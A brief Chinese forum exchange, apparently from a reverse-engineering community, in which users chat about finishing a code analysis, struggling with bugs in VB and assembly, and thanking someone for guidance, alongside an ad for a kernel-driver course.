代码很快就分析完了。。也学到了些东西,比如怎么写配置程序,怎么让自己的程序多了压缩功能等。可是由于自己编程实在太差了,用VB写老是出BUG,用汇编写
了几天也还有BUG,好头痛啊。。。。
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
NBW可不要把我吓坏了呀,就我这水平
那有闭关呀,玩了大半年泡泡堂,能进crack大门逛逛,还得谢谢你的指点呀
